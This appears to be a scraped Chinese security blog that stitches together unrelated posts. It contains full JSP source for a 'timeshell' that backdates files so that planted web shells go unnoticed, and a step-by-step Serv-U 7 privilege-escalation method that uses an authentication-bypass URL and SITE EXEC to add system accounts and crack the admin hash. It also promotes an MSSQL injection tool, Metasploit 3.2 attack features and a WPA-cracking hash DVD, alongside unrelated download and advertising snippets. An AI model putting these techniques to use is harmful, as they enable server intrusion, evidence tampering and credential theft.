Chinadu's Blog

去这里下载：
http://lzm.backtrack4.cn

作者：oldjun

很多网站的管理员通过查看文件的修改时间定位被入侵后流下的网马与后门，因此修改文件的创建与修改时间可以有效的预防后门的泄露。

昨天研究了下，JSP只提供了修改“文件修改时间”的接口，却没有提供修改“文件创建时间”的接口，因此貌似只能修改“文件修改时间 ”，kj021320的JSP SHELL有这个功能，不过只能修改年月日，而且昨晚我遇到的RESIN 2.1.9 运行不了kj021320的那个SHELL，于是决定自己写个小的shell！

主要功能：
1.文件的时间属性查看，包括修改时间与创建时间；
2.文件修改时间的修改，精确到秒；

代码如下：
(Apache Tomcat/6.0.18下运行通过！)

   1. <%@ page import="java.io.*" %>  
   2. <%@ page import="java.util.*, java.text.*" %>  
   3. <%@ page language="java" import="java.util.Enumeration" contentType="text/html; charset=GB2312"%>  
   4.  
   5. <html>  
   6. <head>  
   7. <title>JSP timeshell by oldjun</title>  
   8. <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>  
   9. <body>  
  10. <H1>JSP timeshell by oldjun</H1>  
  11. <%!  
  12. public static String getFileCreateDate(File _file) {  
  13.         File file = _file;  
  14.         try {  
  15.             Process ls_proc = Runtime.getRuntime().exec("cmd.exe /c dir \"" + file.getAbsolutePath() + "\" /tc");  
  16.             BufferedReader br = new BufferedReader(new InputStreamReader(ls_proc.getInputStream()));  
  17.             for (int i = 0; i < 5; i++) {  
  18.                 br.readLine();  
  19.             }  
  20.             String stuff = br.readLine();  
  21.             StringTokenizer st = new StringTokenizer(stuff);  
  22.             String dateC = st.nextToken();  
  23.             String time = st.nextToken();  
  24.             String datetime = dateC.concat(" "+time);  
  25.             br.close();  
  26.             return datetime;  
  27.         } catch (Exception e) {  
  28.             return null;  
  29.         }  
  30.     }  
  31. String folderReplace(String folder){  
  32.     return folder.replace('\\','/');  
  33. }  
  34. %>                                                                      
  35. <%  
  36. String action = null;  
  37. if (request.getParameter("action") == null)  
  38.         action = "main";  
  39.     else   
  40.         action = (String)request.getParameter("action");  
  41. if (action.equals("main")) {  
  42. %>  
  43. <form name= form1 method="post" action="?action=getinfo">  
  44. filepath:<input name="file" type="text" size="100" /><br>(for instance C:/Program Files/Apache Software Foundation/Tomcat 6.0/webapps/ROOT/time.jsp)<br>  
  45. <input type="submit" name="Button" value="getinfo"/>  
  46. </form>  
  47. <%  
  48. }else if (action.equals("getinfo")) {  
  49. String filepath = folderReplace(request.getParameter("file"));  
  50. File file = new File(filepath);  
  51. if(!file.exists()){  
  52.         out.println("<script lanugage=\"javascript\">alert(\"file:"+filepath+" not find!\");history.back();</script>");     
  53.     }  
  54. %>  
  55. filepath:<br>  
  56. <%=filepath%><br><br>  
  57. lastModifiedtime:<br>  
  58. <%=new Date(file.lastModified())%><br><br>  
  59. Createtime:<br>  
  60. <%  
  61. String Createtime=getFileCreateDate(file);  
  62. out.println(Createtime);  
  63. %><br><br>  
  64. now:<br>  
  65. <%  
  66. Date myDate = new Date();  
  67. out.println(myDate.toLocaleString());  
  68. %>  
  69. <form name= form2 method="post" action="?action=change">  
>  70. <input name="year" type="text" size="10"/>year  
  71. <input name="month" type="text" size="10"/>month  
  72. <input name="day" type="text" size="10"/>day  
  73. <input name="hour" type="text" size="10"/>hour  
  74. <input name="min" type="text" size="10"/>minute  
  75. <input name="sec" type="text" size="10"/>second  
  76. <input name="file" type="hidden" value="<%=filepath%>" /><br>  
  77. <input type="submit" name="Button" value="change"/>  
  78. </form>  
  79. <%  
  80. }else if (action.equals("change")) {  
  81. String url="?action=main";  
  82. String filepath = folderReplace(request.getParameter("file"));  
  83. String year = request.getParameter("year");  
  84. String month = request.getParameter("month");  
  85. String day = request.getParameter("day");  
  86. String hour = request.getParameter("hour");  
  87. String min = request.getParameter("min");  
  88. String sec = request.getParameter("sec");  
  89. File file = new File(filepath);  
  90. Calendar calendar=Calendar.getInstance();  
  91. calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day),Integer.parseInt(hour),Integer.parseInt(min),Integer.parseInt(sec));  
  92. if(file.setLastModified(calendar.getTimeInMillis()))  
  93. out.println("<script lanugage=\"javascript\">alert(\"file date change success!\");location.href=\""+url+"\";</script>");  
  94. else 
  95. out.println("<script lanugage=\"javascript\">alert(\"time error!\");history.back();</script>");   
  96. }  
  97. %>  
  98. </body>  
  99. </html> 


http://www.backtrack4.cn

BT4的镜像站点

下载地址：
http://download.backtrack4.cn/

Sql_2005_inj是专门用于注入mssql2005数据库的工具，是我去年暑假7月份写的。由于功能很简单不完善一直没发布，由于要写新版本所以把老的放出来晒晒。

界面很简单没有什么好介绍的，就提一点，列名显示的时候有两种颜色，红色和黑色，黑色的肯定可以猜解，而红色的属于特殊类型数据，有可能不能猜解出来。

最后感谢一下tr4c3，他的脚本对我的帮助很大，同时还要感谢remax，没少帮我测试。

kook1991 3:10 2009-1-18 weknow[at]163[dot]com

点击下载

下面是迅雷统计系统的一些特色功能。

　　特色功能1：访客现场直播

　　将网站上面发生的事情几乎实时地反映到迅雷统计上面。事无巨细，一览无余，全面掌握网站的访问详情。

　　适用对象：中小型网站。不适合每天有几十万以上流量的网站（刷屏太快）。

　　作用：试试打开现场直播以后，在QQ群里面推广一下自己的网站。就可以立竿见影地评估推广效果。

　　特色功能2：标题记录

　　是不是已经厌倦了热门页等统计中，看着满屏幕的URL，却不知道是哪个页面呢？迅雷统计记录页面URL的同时，也将标题记录下来。让看的人更加直观地认识到页面的访问情况。而不用一个个点击链接去查看URL所代表的页面。

　　特色功能3：即时趋势分析

　　在每一个详细表格中，鼠标移动到每一个格子上面的时候，都会出现一个"添加到趋势图"的按钮。点击了之后就会将当前格子的历史数据显示到上面的趋势图中，方便分析出每个内容的每个指标的走势。

　　目前迅雷统计需要注册迅雷联盟会员才能参与，并且要成功推广5名注册用户时才能获得激活码，每天只能激活180个用户，超过了之后只能等第二天才能激活，总的来说，注册还很麻烦。

注册地址：http://tj.xunlei.com/register.jsp?fromCopartnerId=73218

MSDN Windows XP Professional x64 Edition with SP2 - VL (English)+简体中文语言包

by 空虚浪子心 http://www.inbreak.net

注：由于作者懒，没有提供日志清理功能，会留下日志：

一，su7是提权有几种方式？
有两种形式去干掉su7。
1>，登陆管理员控制台的页面
==>获取OrganizationId，用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账户。
 

2>，登陆管理员控制台页面
==>基本WEB客户端
==>来到serv-u的目录下--users--Global user目录
==>上传一个你已经定义好的用户文件
==>用户登陆
==>执行系统命令添加系统账户
而本文件使用了第一种方法。

二，提权的原理？
Su7的管理平台是http的，很先进。
抓包，分析，发现了以下路程是可以利用的。
1，    管理员从管理控制台打开web页面时，是不需要验证密码的。
2，    管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3，    管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4，    管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。
Su7也有自己的数据库，他也会自己生成一个id。
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。
这很像oracle的insert手段。

写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。
添加权限时，也是可以利用这个ID的。
于是工具一共连接了6次服务器，这几次分别是：
1，    用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。
2，    获取OrganizationId，用于添加用户
3，    用来请求一个用户ID。
4，    修改该ID的登陆用户名，密码。
5，    修改该ID的权限，加c盘的写删执行等。
6，    这次连接是做坏事的，使用前面添加的用户执行系统命令。

三，为啥我明明显示成功了，但是却提不上去？
这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。
一般有以下几种情况：
1，可能是因为管理员密码不对。
参照管理员密码的连接。
2，可能是因为管理员限制了执行SITE EXEC。
有待程序修改，程序可以加一个让他不限制的功能。
3，可能是程序问题。
4，为啥作者有这么多理由不去改？
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。
到时候，我再写个功能，把这玩意改回来就是。
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)

四，关于管理员密码

默认为空，如果密码为空，填什么都能进去。
如果修改过，管理员密码默认会在这里：
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456，去掉kx就是密码了。
你可以针对这个加密生成字典。

下载地址：200812030843555684.rar

Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com


Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
is provided under a true open source software license (BSD) and is
backed by a community-based development team.

Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the iPhone. Users can access Metasploit using the tab-completing console
interface, the Gtk GUI, the command line scripting interface, or the
AJAX-enabled web interface. The Windows version of Metasploit includes
all software dependencies and a selection of useful networking tools.

The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at


- http://metasploit.com/framework/


This release includes a significant number of new features and
capabilities, many of which are highlighted below.

Version 3.2 includes exploit modules for recent Microsoft flaws, such
as MS08-041, MS08-053, MS08-059, MS08-067, MS08-068, and many more.

The module format has been changed in version 3.2. The new format
removes the previous naming and location restrictions and paved the way
to an improved module loading and caching backend. For users, this means
being able to copy a module into nearly any subdirectory and be able to
immediately use it without edits.

The Byakugan WinDBG extension developed by Pusscat has been integrated
with this release, enabling exploit developers to quickly exploit new
vulnerabilities using the best Win32 debugger available today.

The Context-Map payload encoding system development by I)ruid is now
enabled in this release, allowing for any chunk of known process memory to
be used as an encoding key for Windows payloads.

The Incognito token manipulation toolkit, written by Luke Jennings, has
been integrated as a Meterpreter module. This allows an attacker to gain
new privleges through token hopping. The most common use is to hijack
domain admin credentials once remote system access is obtained.

The PcapRub, Scruby, and Packetfu libraries have all been linked into
the Metasploit source tree, allowing easy packet injection and capture.

The METASM pure-Ruby assembler, written by Yoann Guillot and Julien
Tinnes, has gone through a series of updates. The latest version has been
integrated with Metasploit and now supports MIPS assembly and the ability
to compile C code.

The Windows payload stagers have been updated to support targets with
NX CPU support. These stagers now allocate a read/write/exec segment of
memory for all payload downloads and execution.

Executables which have been generated by msfpayload or msfencode now
support NX CPUs. The generated executable is now smaller and more
reliable, opening the door to a wider range of uses. The psexec and
smb_relay modules now use an executable template thats acts like a real
Windows service, improving the reliability and cleanup requirements of
these modules.

The Reflective DLL Injection technique pioneered by Stephen Fewer of
Harmony Security has been integrated into the framework. The new payloads
use the "reflectivedllinjection" stager prefix and share the same binaries
as the older DLL injection method.

Client-side browser exploits now benefit from a set of new javascript
obfuscation techniques developed by Egypt. This improvement leads to a
greater degree of anti-virus bypass for client-side exploits.

Metasploit contains dozens of exploit modules for web browsers and
third-party plugins. The new browser_autopwn module ties many of these
together with advanced fingerprinting techniques to deliver more shells
than most pen-testers know what to do with.

This release includes a set of man-in-the-middle, authentication relay,
and authentication capture modules. These modules can be integrated with
a fake proxy (WPAD), a malicious access point (Karmetasploit), or basic
network traffic interception to gain access to client machines. These
modules tie together browser_autopwn, SMB relaying, and HTTP credential
and form capturing to pillage data from client systems.

Nearly all Metasploit modules now support IPv6 transports. IPv6 stagers
exist for the Windows and Linux platforms, opening the door for penetration
testing of pure IPv6 networks. The VNCInject and Meterpreter payloads have
been extensively tested over IPv6 sockets.

Efrain Torres's WMAP project has been merged into Metasploit. WMAP is
general purpose web application scanning framework that can be automated
through integration with an attack proxy (ratproxy) or be accessed as
individual auxiliary modules.

Egypt's new PHP payloads provide complete bind, reverse, and findsock
support for PHP web application exploits. If you are sick of C99 and R57
and looking to gain a "real" shell from one of the hundreds of RFI flaws
listed on milw0rm, the new PHP payloads work great against multiple
operating systems.

The db_autopwn command has been revamped to support port-based limits,
regex-based module matching, and limits on the number of spawned jobs. The
end result is a way to quickly launch specific modules against a specific
set of target machines. These changes were suggested and implemented by
Marcell 'SkyOut' Dietl (Helith).


Enjoy the release,

hdm mc egypt
pusscat ramon patrickw
I)ruid et kkatterjohn

此次由ZerOne安全团队制作的无线安全破解专用DVD光盘，其中包含的WPA 破解 Hash Table已全部经过测试可用，所含SSID均为ZerOne安全团队在对多个省会城市进行多次实地War-Driving无线探测基础上，从汇总数据中精心挑选出国内使用频率最高的前62个SSID整理而成。光盘里除了包含多达40余种8位以上生日类密码组合外，还包括了8位以上普通用户常用密码组合，总容量达 4.4GB。实为无线安全密码破解测试、无线渗透测试及安全评估之必备利器。

     该DVD光盘内除了主要包含的大容量WPA-PSK/WPA2-PSK 破解用 Hash Table以外，为方便大家学习及借鉴，还附赠了由ZerOne安全团队近年来进行省会城市War-Driving的官方探测汇总报告，此外，还准备了相关无线安全教程的文档及资源列表。希望借此给大家研究无线网络安全带来实质性的帮助。

     哈，作为国内第一张无线安全破解专用WPA-PSK Hash Table DVD，除实用价值外，也极具收藏和纪念意义！！

由于光盘体积过大，所以HTTP下载目前暂不可用，下为目前公开的下载方式及地址汇总：

WPA-PSK/WPA2-PSK光盘BT下载

种子一：http://bigpack.blogbus.com/files/12266612070.torrent 

上述种子中的DVD光盘镜像文件已压缩，从ISO压成RAR，大约减少了900M，可为所有下载的朋友节省许多时间

种子文件物征码：60a0cca09203ed9b309c95047f3333acb1661d32  分块大小: 512 KB

种子二： http://bigpack.blogbus.com/files/12266612980.torrent 

--------------------------------------------------------------------------- 

纳米盘下载

共22个分包。该资源比较大，需纳米机器人下载。没装纳米机器人，点此安装纳米机器人
ZerOne WPA HASH.part01.rar
ZerOne WPA HASH.part02.rar
ZerOne WPA HASH.part03.rar
ZerOne WPA HASH.part04.rar
ZerOne WPA HASH.part05.rar
ZerOne WPA HASH.part06.rar
ZerOne WPA HASH.part07.rar
ZerOne WPA HASH.part08.rar
ZerOne WPA HASH.part09.rar
ZerOne WPA HASH.part10.rar
ZerOne WPA HASH.part11.rar
ZerOne WPA HASH.part12.rar
ZerOne WPA HASH.part13.rar
ZerOne WPA HASH.part14.rar
ZerOne WPA HASH.part15.rar
ZerOne WPA HASH.part16.rar
ZerOne WPA HASH.part17.rar
ZerOne WPA HASH.part18.rar
ZerOne WPA HASH.part19.rar
ZerOne WPA HASH.part20.rar
ZerOne WPA HASH.part21.rar
ZerOne WPA HASH.part22.rar

感谢所有无线安全爱好者、朋友们

You can get Slax from this website in several formats. Slax for CD is distributed as an ISO image. Burn it to a CD using a special menu option in your burning software, it's usually labeled 'burn CD iso image'. Slax for USB is distributed as a TAR archive. Simply unzip it to your USB device and run bootinst.bat (or bootinst.sh) to make it bootable.

download Slax for CD

slax-6.0.7.iso MD5:cde0ecba3c8289d786e12c44666ded6e

download Slax for USB

slax-6.0.7.tar MD5:a910b1c9e108e74b71e6f063d20064de

TP-link TP-link
D-Link dlink
3COM 3com,comcomcom
linksys linksys
Dell Wireless
NETGEAR NETGEAr,Wireless
SMC SMC,WLAN
Belkin贝尔金 Belkin54g,WLAN
NETCORE NETCORE
Cisco tsunami
intel intel,xlan,101
独立固件 dd-wrt
独立固件 tomato
中国电信 AR7WRD,HG520s
中国移动 CMCC
中国网通 CNC